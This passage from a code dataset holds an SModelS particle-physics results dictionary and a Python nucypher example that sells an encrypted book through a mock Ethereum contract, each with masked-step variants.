4.245413557698921, 'upper limit (fb)': 4.0, 'expected upper limit (fb)':
4.16, 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],
'AnalysisID': 'ATLAS-CONF-2013-047', 'DataSetID': 'C Medium',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 1.0613533894247302, 'r_expected':
1.0205321052160867, 'chi2': 2.344696287811548, 'likelihood':
8.123400145704854e-05}, {'maxcond': 0.0, 'theory prediction (fb)':
284.6597475, 'upper limit (fb)': 1041.0116, 'expected upper limit (fb)':
None, 'TxNames': ['TChiWZ'], 'Mass (GeV)': [[163.6, 57.4], [165.0, 57.4
]], 'AnalysisID': 'ATLAS-SUSY-2013-12', 'DataSetID': None,
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'upperLimit', 'r': 0.2734453175161545, 'r_expected': None}, {'maxcond':
0.0, 'theory prediction (fb)': 169.351124, 'upper limit (fb)': 1582.346,
'expected upper limit (fb)': None, 'TxNames': ['TChiWW'], 'Mass (GeV)':
[[163.6, 57.4], [163.6, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-11',
'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,
'dataType': 'upperLimit', 'r': 0.10702534338254717, 'r_expected': None},
{'maxcond': 0.0, 'theory prediction (fb)': 0.10289469462216802,
'upper limit (fb)': 1.07, 'expected upper limit (fb)': 1.17, 'TxNames':
['TChiWW'], 'Mass (GeV)': [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID':
'ATLAS-SUSY-2013-11', 'DataSetID': 'WWa-DF', 'AnalysisSqrts (TeV)': 8.0,
'lumi (fb-1)': 20.3, 'dataType': 'efficiencyMap', 'r':
0.09616326600202618, 'r_expected': 0.08794418343775044, 'chi2':
0.23492769120756485, 'likelihood': 0.0021296922629215516}, {'maxcond':
0.0, 'theory prediction (fb)': 0.09049519199332233, 'upper limit (fb)':
0.97, 'expected upper limit (fb)': 0.762, 'TxNames': ['T2'],
'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':
'ATLAS-CONF-2013-054', 'DataSetID': '8j50 flavor 0 b-jets',
'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':
'efficiencyMap', 'r': 0.09329401236424983, 'r_expected':
0.11876009447942563, 'chi2': 0.13085006931201093, 'likelihood':
0.005704888785414326}, {'maxcond': 0.0, 'theory prediction (fb)':
602.7377329999999, 'upper limit (fb)': 17857.06,
'expected upper limit (fb)': None, 'TxNames': ['TChiWZ'], 'Mass (GeV)':
[[163.6, 57.4], [165.0, 57.4]], 'AnalysisID': 'CMS-SUS-16-034',
'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,
'dataType': 'upperLimit', 'r': 0.033753469664099235, 'r_expected': None
}], 'Total xsec considered (fb)': 5455.932556090008,
'Missed Topologies': [{'sqrts (TeV)': 13.0, 'weight (fb)':
1525.2339345595758, 'element': "[[[jet]],[[jet],[jet]]] ('MET', 'MET')"
}, {'sqrts (TeV)': 13.0, 'weight (fb)': 164.5650363, 'element':
"[[],[[W]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
131.21450642075922, 'element':
"[[[jet],[Z]],[[jet],[jet]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 131.09407599353733, 'element':
"[[[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 125.30880443708375, 'element':
"[[[jet]],[[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0,
'weight (fb)': 109.09980502038648, 'element':
"[[[jet],[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)':
13.0, 'weight (fb)': 87.78855441, 'element':
"[[],[[Z]]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
23.328775686902066, 'element': "[[],[[jet]]] ('MET', 'MET')"}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 18.943846, 'element':
"[[],[]] ('MET', 'MET')"}, {'sqrts (TeV)': 13.0, 'weight (fb)':
11.23256793951906, 'element':
"[[[jet],[Z]],[[jet],[jet],[Z]]] ('MET', 'MET')"}], 'Long Cascades': [{
'sqrts (TeV)': 13.0, 'weight (fb)': 142.32664393305637, 'mother PIDs':
[[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 113.78856056272761, 'mother PIDs': [[1000021, 1000021]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 2.556908397604195, 'mother PIDs':
[[2000001, 2000002], [2000002, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 1.658904680547042, 'mother PIDs': [[1000021, 2000002]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 1.5034517332026478, 'mother PIDs':
[[1000002, 1000021]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
0.73751489438902, 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)':
13.0, 'weight (fb)': 0.514380675953777, 'mother PIDs': [[1000001,
2000001], [1000001, 2000003], [1000003, 2000001], [1000003, 2000003]]},
{'sqrts (TeV)': 13.0, 'weight (fb)': 0.22710347967142056, 'mother PIDs':
[[1000002, 2000001], [1000002, 2000003]]}], 'Asymmetric Branches': [{
'sqrts (TeV)': 13.0, 'weight (fb)': 1656.3887238722155, 'mother PIDs':
[[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 164.5650363, 'mother PIDs': [[1000022, 1000024]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 126.94317745006455, 'mother PIDs':
[[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 81.7049616, 'mother PIDs': [[
1000022, 1000023]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
25.33546877159406, 'mother PIDs': [[1000022, 2000001], [1000022,
2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': 8.580393075610981,
'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 6.08359281, 'mother PIDs': [[1000022, 1000025]]}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 2.055186185956878, 'mother PIDs': [
[1000025, 2000001], [1000025, 2000003]]}, {'sqrts (TeV)': 13.0,
'weight (fb)': 0.5969685251910638, 'mother PIDs': [[1000023, 2000001],
[1000023, 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)':
0.42547403652557386, 'mother PIDs': [[1000021, 1000025]]}],
'Outside Grid': [{'sqrts (TeV)': 13.0, 'weight (fb)':
0.07215987170114271, 'element': "[[[jet]],[[jet]]] ('MET', 'MET')"}, {
'sqrts (TeV)': 13.0, 'weight (fb)': 0.021621502520314927, 'element':
"[[[l]],[[l]]] ('MET', 'MET')"}]}
|
normal
|
{
"blob_id": "94d303716eac7fa72370435fe7d4d1cdac0cdc48",
"index": 6151,
"step-1": "<mask token>\n",
"step-2": "smodelsOutput = {'OutputStatus': {'sigmacut': 0.01, 'minmassgap': 5.0,\n 'maxcond': 0.2, 'ncpus': 1, 'file status': 1, 'decomposition status': 1,\n 'warnings': 'Input file ok', 'input file':\n 'inputFiles/scanExample/slha/100968509.slha', 'database version':\n '1.2.0', 'smodels version': '1.2.0rc'}, 'ExptRes': [{'maxcond': 0.0,\n 'theory prediction (fb)': 728.7491431153657, 'upper limit (fb)': \n 44.22312638711652, 'expected upper limit (fb)': None, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'CMS-SUS-16-033', 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0,\n 'lumi (fb-1)': 35.9, 'dataType': 'upperLimit', 'r': 16.478915053090216,\n 'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)': \n 728.7491431153657, 'upper limit (fb)': 55.74859999999999,\n 'expected upper limit (fb)': None, 'TxNames': ['T2'], 'Mass (GeV)': [[\n 541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-16-036',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,\n 'dataType': 'upperLimit', 'r': 13.072061775817971, 'r_expected': None},\n {'maxcond': 0.0, 'theory prediction (fb)': 132.83976207255284,\n 'upper limit (fb)': 36.140272, 'expected upper limit (fb)': None,\n 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],\n 'AnalysisID': 'CMS-SUS-13-019', 'DataSetID': None,\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5, 'dataType':\n 'upperLimit', 'r': 3.675671341725177, 'r_expected': None}, {'maxcond': \n 0.0, 'theory prediction (fb)': 0.9562482176560967, 'upper limit (fb)': \n 0.274, 'expected upper limit (fb)': 0.154, 'TxNames': ['T2', 'T5',\n 'TChiZZ'], 'Mass (GeV)': None, 'AnalysisID': 'CMS-SUS-13-012',\n 'DataSetID': '6NJet8_1250HT1500_450MHTinf', 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 19.5, 'dataType': 'efficiencyMap', 'r': \n 3.489956998744878, 'r_expected': 6.209404010753875, 'chi2': \n 13.063642260056689, 'likelihood': 6.008581252238334e-05}, {'maxcond': \n 0.0, 'theory prediction (fb)': 132.83976207255284, 'upper limit (fb)': \n 58.50226240000003, 'expected upper limit (fb)': None, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-02', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 20.3, 'dataType': 'upperLimit', 'r': 2.270677348583237,\n 'r_expected': None}, {'maxcond': 0.0, 'theory prediction (fb)': \n 9.084517413967422, 'upper limit (fb)': 4.2419,\n 'expected upper limit (fb)': 5.5524, 'TxNames': ['T2'], 'Mass (GeV)': [\n [541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-02',\n 'DataSetID': 'SR2jm', 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,\n 'dataType': 'efficiencyMap', 'r': 2.141615175739037, 'r_expected': \n 1.6361424634333661, 'chi2': 11.844156696751806, 'likelihood': \n 3.1390377843658383e-07}, {'maxcond': 0.0, 'theory prediction (fb)': \n 132.83976207255284, 'upper limit (fb)': 67.69032800000002,\n 'expected upper limit (fb)': 67.79354400000003, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'CMS-SUS-12-028', 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 11.7, 'dataType': 'upperLimit', 'r': 1.9624629691933657,\n 'r_expected': 1.9594751097914693}, {'maxcond': 0.0,\n 'theory prediction (fb)': 0.7285976790027092, 'upper limit (fb)': 0.506,\n 'expected upper limit (fb)': 0.464, 'TxNames': ['T5'], 'Mass (GeV)': [[\n 881.8, 541.4, 57.4], [881.8, 541.4, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-04', 'DataSetID': 'GtGrid_SR_7ej80_0bjet',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi 
(fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 1.4399163616654331, 'r_expected': \n 1.5702536185403213, 'chi2': 7.225026655774327, 'likelihood': \n 0.0005573265805884188}, {'maxcond': 0.0, 'theory prediction (fb)': \n 132.83976207255284, 'upper limit (fb)': 97.78847200000001,\n 'expected upper limit (fb)': 69.450736, 'TxNames': ['T2'], 'Mass (GeV)':\n [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID': 'CMS-SUS-13-012',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 19.5,\n 'dataType': 'upperLimit', 'r': 1.358439899465377, 'r_expected': \n 1.9127192845379328}, {'maxcond': 0.0, 'theory prediction (fb)': \n 4.245413557698921, 'upper limit (fb)': 4.0, 'expected upper limit (fb)':\n 4.16, 'TxNames': ['T2'], 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]],\n 'AnalysisID': 'ATLAS-CONF-2013-047', 'DataSetID': 'C Medium',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 1.0613533894247302, 'r_expected': \n 1.0205321052160867, 'chi2': 2.344696287811548, 'likelihood': \n 8.123400145704854e-05}, {'maxcond': 0.0, 'theory prediction (fb)': \n 284.6597475, 'upper limit (fb)': 1041.0116, 'expected upper limit (fb)':\n None, 'TxNames': ['TChiWZ'], 'Mass (GeV)': [[163.6, 57.4], [165.0, 57.4\n ]], 'AnalysisID': 'ATLAS-SUSY-2013-12', 'DataSetID': None,\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'upperLimit', 'r': 0.2734453175161545, 'r_expected': None}, {'maxcond':\n 0.0, 'theory prediction (fb)': 169.351124, 'upper limit (fb)': 1582.346,\n 'expected upper limit (fb)': None, 'TxNames': ['TChiWW'], 'Mass (GeV)':\n [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID': 'ATLAS-SUSY-2013-11',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3,\n 'dataType': 'upperLimit', 'r': 0.10702534338254717, 'r_expected': None},\n {'maxcond': 0.0, 'theory prediction (fb)': 0.10289469462216802,\n 'upper limit (fb)': 1.07, 'expected upper limit (fb)': 1.17, 'TxNames':\n ['TChiWW'], 'Mass (GeV)': [[163.6, 57.4], [163.6, 57.4]], 'AnalysisID':\n 'ATLAS-SUSY-2013-11', 'DataSetID': 'WWa-DF', 'AnalysisSqrts (TeV)': 8.0,\n 'lumi (fb-1)': 20.3, 'dataType': 'efficiencyMap', 'r': \n 0.09616326600202618, 'r_expected': 0.08794418343775044, 'chi2': \n 0.23492769120756485, 'likelihood': 0.0021296922629215516}, {'maxcond': \n 0.0, 'theory prediction (fb)': 0.09049519199332233, 'upper limit (fb)':\n 0.97, 'expected upper limit (fb)': 0.762, 'TxNames': ['T2'],\n 'Mass (GeV)': [[541.4, 57.4], [541.4, 57.4]], 'AnalysisID':\n 'ATLAS-CONF-2013-054', 'DataSetID': '8j50 flavor 0 b-jets',\n 'AnalysisSqrts (TeV)': 8.0, 'lumi (fb-1)': 20.3, 'dataType':\n 'efficiencyMap', 'r': 0.09329401236424983, 'r_expected': \n 0.11876009447942563, 'chi2': 0.13085006931201093, 'likelihood': \n 0.005704888785414326}, {'maxcond': 0.0, 'theory prediction (fb)': \n 602.7377329999999, 'upper limit (fb)': 17857.06,\n 'expected upper limit (fb)': None, 'TxNames': ['TChiWZ'], 'Mass (GeV)':\n [[163.6, 57.4], [165.0, 57.4]], 'AnalysisID': 'CMS-SUS-16-034',\n 'DataSetID': None, 'AnalysisSqrts (TeV)': 13.0, 'lumi (fb-1)': 35.9,\n 'dataType': 'upperLimit', 'r': 0.033753469664099235, 'r_expected': None\n }], 'Total xsec considered (fb)': 5455.932556090008,\n 'Missed Topologies': [{'sqrts (TeV)': 13.0, 'weight (fb)': \n 1525.2339345595758, 'element': \"[[[jet]],[[jet],[jet]]] ('MET', 'MET')\"\n }, {'sqrts (TeV)': 13.0, 'weight (fb)': 164.5650363, 'element':\n \"[[],[[W]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 131.21450642075922, 'element':\n \"[[[jet],[Z]],[[jet],[jet]]] ('MET', 
'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 131.09407599353733, 'element':\n \"[[[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 125.30880443708375, 'element':\n \"[[[jet]],[[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 109.09980502038648, 'element':\n \"[[[jet],[jet]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': \n 13.0, 'weight (fb)': 87.78855441, 'element':\n \"[[],[[Z]]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 23.328775686902066, 'element': \"[[],[[jet]]] ('MET', 'MET')\"}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 18.943846, 'element':\n \"[[],[]] ('MET', 'MET')\"}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 11.23256793951906, 'element':\n \"[[[jet],[Z]],[[jet],[jet],[Z]]] ('MET', 'MET')\"}], 'Long Cascades': [{\n 'sqrts (TeV)': 13.0, 'weight (fb)': 142.32664393305637, 'mother PIDs':\n [[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 113.78856056272761, 'mother PIDs': [[1000021, 1000021]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 2.556908397604195, 'mother PIDs':\n [[2000001, 2000002], [2000002, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 1.658904680547042, 'mother PIDs': [[1000021, 2000002]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 1.5034517332026478, 'mother PIDs':\n [[1000002, 1000021]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.73751489438902, 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)':\n 13.0, 'weight (fb)': 0.514380675953777, 'mother PIDs': [[1000001, \n 2000001], [1000001, 2000003], [1000003, 2000001], [1000003, 2000003]]},\n {'sqrts (TeV)': 13.0, 'weight (fb)': 0.22710347967142056, 'mother PIDs':\n [[1000002, 2000001], [1000002, 2000003]]}], 'Asymmetric Branches': [{\n 'sqrts (TeV)': 13.0, 'weight (fb)': 1656.3887238722155, 'mother PIDs':\n [[1000021, 2000001], [1000021, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 164.5650363, 'mother PIDs': [[1000022, 1000024]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 126.94317745006455, 'mother PIDs':\n [[2000001, 2000001], [2000001, 2000003], [2000003, 2000003]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 81.7049616, 'mother PIDs': [[\n 1000022, 1000023]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 25.33546877159406, 'mother PIDs': [[1000022, 2000001], [1000022, \n 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': 8.580393075610981,\n 'mother PIDs': [[1000021, 1000022]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 6.08359281, 'mother PIDs': [[1000022, 1000025]]}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 2.055186185956878, 'mother PIDs': [\n [1000025, 2000001], [1000025, 2000003]]}, {'sqrts (TeV)': 13.0,\n 'weight (fb)': 0.5969685251910638, 'mother PIDs': [[1000023, 2000001],\n [1000023, 2000003]]}, {'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.42547403652557386, 'mother PIDs': [[1000021, 1000025]]}],\n 'Outside Grid': [{'sqrts (TeV)': 13.0, 'weight (fb)': \n 0.07215987170114271, 'element': \"[[[jet]],[[jet]]] ('MET', 'MET')\"}, {\n 'sqrts (TeV)': 13.0, 'weight (fb)': 0.021621502520314927, 'element':\n \"[[[l]],[[l]]] ('MET', 'MET')\"}]}\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from eth_account.account import Account
from nucypher.characters.lawful import Alice, Bob, Ursula
from nucypher.network.middleware import RestMiddleware
from nucypher.data_sources import DataSource
from umbral.keys import UmbralPublicKey
import sys
import os
import binascii
import shutil
import maya
import datetime
teacher_rest_port = 3501
m = 2
n = 3
with open("examples-runtime-cruft/node-metadata-{}".format(teacher_rest_port), "r") as f:
f.seek(0)
teacher_bytes = binascii.unhexlify(f.read())
URSULA = Ursula.from_bytes(teacher_bytes, federated_only=True)
print("Will learn from {}".format(URSULA))
SHARED_CRUFTSPACE = "{}/examples-runtime-cruft".format(os.path.dirname(os.path.abspath(__file__)))
CRUFTSPACE = "{}/drm".format(SHARED_CRUFTSPACE)
CERTIFICATE_DIR = "{}/certs".format(CRUFTSPACE)
shutil.rmtree(CRUFTSPACE, ignore_errors=True)
os.mkdir(CRUFTSPACE)
os.mkdir(CERTIFICATE_DIR)
URSULA.save_certificate_to_disk(CERTIFICATE_DIR)
class ETHAccount(object):
def send_eth_to(self, to, amount):
return(to.fallback(self, amount))
class Author(object):
"""
The author of the book
"""
balance = 0
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
class Book(object):
def __init__(self, author):
self.author = author
self.content = b"PlainText of the book"
self.label = b"book"
class BookStoreEthContract(object):
"""
The contract receiving the rewards and selling the books
"""
def __init__(self, book, author, price, purchase_event_hook):
self.book = book
self.rewardee = author
self.price = price
self.purchase_event_hook = purchase_event_hook
def fallback(self, sender, amount):
print("Received %s ETH from %s" % (amount, sender.account.address))
if amount == self.price:
sender.balance -= amount
self.rewardee.balance += amount
return(self.purchase_event_hook(sender))
class BookStoreDelivery(object):
def __init__(self, book):
self.book = book
self.author = book.author
def deliver_purchase(self, to):
policy_end_datetime = maya.now() + datetime.timedelta(days=5)
policy = author.character.grant(first_buyer.character, self.book.label, m=m, n=n,
expiration=policy_end_datetime)
author_pubkey = bytes(self.author.character.stamp)
data_source = DataSource(policy_pubkey_enc=policy.public_key)
message_kit, _signature = data_source.encapsulate_single_message(self.book.content)
data_source_public_key = bytes(data_source.stamp)
return (author_pubkey, policy.public_key, data_source_public_key, self.book.label, message_kit)
class Buyer(ETHAccount):
"""
The person who pays for the book and receives content
"""
balance = 100
def __init__(self, eth_pk_bytes, character):
self.account = Account.create(eth_pk_bytes)
self.character = character
author = Author(b"Author's ETH account", Alice(network_middleware=RestMiddleware(),
known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR,))
author.character.start_learning_loop(now=True)
book = Book(author)
first_buyer = Buyer(b"First Buyer's ETH account", Bob(known_nodes=(URSULA,),
federated_only=True,
known_certificates_dir=CERTIFICATE_DIR))
book_store_delivery = BookStoreDelivery(book)
book_store_contract = BookStoreEthContract(book, author, 10, book_store_delivery.deliver_purchase)
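# paying the contract price triggers its fallback, which grants the buyer a policy and returns the encrypted book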
author_public_key, policy_public_key, data_source_public_key, label, kit = first_buyer.send_eth_to(book_store_contract, 10)
first_buyer.character.join_policy(label, # The label - he needs to know what data he's after.
bytes(author.character.stamp), # To verify the signature, he'll need Alice's public key.
# He can also bootstrap himself onto the network more quickly
# by providing a list of known nodes at this time.
node_list=[("localhost", 3601)]
)
datasource_as_understood_by_bob = DataSource.from_public_keys(
policy_public_key=policy_public_key,
datasource_public_key=data_source_public_key,
label=label
)
alice_pubkey_restored_from_ancient_scroll = UmbralPublicKey.from_bytes(author_public_key)
delivered_cleartexts = first_buyer.character.retrieve(message_kit=kit,
data_source=datasource_as_understood_by_bob,
alice_verifying_key=alice_pubkey_restored_from_ancient_scroll)
print(delivered_cleartexts)
|
normal
|
{
"blob_id": "bc843abecfc076c9413498f9ebba0da0857ad3cc",
"index": 4103,
"step-1": "<mask token>\n\n\nclass Author(object):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\n",
"step-3": "<mask token>\nwith open('examples-runtime-cruft/node-metadata-{}'.format(\n teacher_rest_port), 'r') as f:\n f.seek(0)\n teacher_bytes = binascii.unhexlify(f.read())\n<mask token>\nprint('Will learn from {}'.format(URSULA))\n<mask token>\nshutil.rmtree(CRUFTSPACE, ignore_errors=True)\nos.mkdir(CRUFTSPACE)\nos.mkdir(CERTIFICATE_DIR)\nURSULA.save_certificate_to_disk(CERTIFICATE_DIR)\n\n\nclass ETHAccount(object):\n\n def send_eth_to(self, to, amount):\n return to.fallback(self, amount)\n\n\nclass Author(object):\n \"\"\"\n The author of the book\n \"\"\"\n balance = 0\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\nclass Book(object):\n\n def __init__(self, author):\n self.author = author\n self.content = b'PlainText of the book'\n self.label = b'book'\n\n\nclass BookStoreEthContract(object):\n \"\"\"\n The contract receiving the rewards and selling the books\n \"\"\"\n\n def __init__(self, book, author, price, purchase_event_hook):\n self.book = book\n self.rewardee = author\n self.price = price\n self.purchase_event_hook = purchase_event_hook\n\n def fallback(self, sender, amount):\n print('Received %s ETH from %s' % (amount, sender.account.address))\n if amount == self.price:\n sender.balance -= amount\n self.rewardee.balance += amount\n return self.purchase_event_hook(sender)\n\n\nclass BookStoreDelivery(object):\n\n def __init__(self, book):\n self.book = book\n self.author = book.author\n\n def deliver_purchase(self, to):\n policy_end_datetime = maya.now() + datetime.timedelta(days=5)\n policy = author.character.grant(first_buyer.character, self.book.\n label, m=m, n=n, expiration=policy_end_datetime)\n author_pubkey = bytes(self.author.character.stamp)\n data_source = DataSource(policy_pubkey_enc=policy.public_key)\n message_kit, _signature = data_source.encapsulate_single_message(self\n .book.content)\n data_source_public_key = bytes(data_source.stamp)\n return (author_pubkey, policy.public_key, data_source_public_key,\n self.book.label, message_kit)\n\n\nclass Buyer(ETHAccount):\n \"\"\"\n The person who pays for the book and receives content\n \"\"\"\n balance = 100\n\n def __init__(self, eth_pk_bytes, character):\n self.account = Account.create(eth_pk_bytes)\n self.character = character\n\n\n<mask token>\nauthor.character.start_learning_loop(now=True)\n<mask token>\nfirst_buyer.character.join_policy(label, bytes(author.character.stamp),\n node_list=[('localhost', 3601)])\n<mask token>\nprint(delivered_cleartexts)\n",
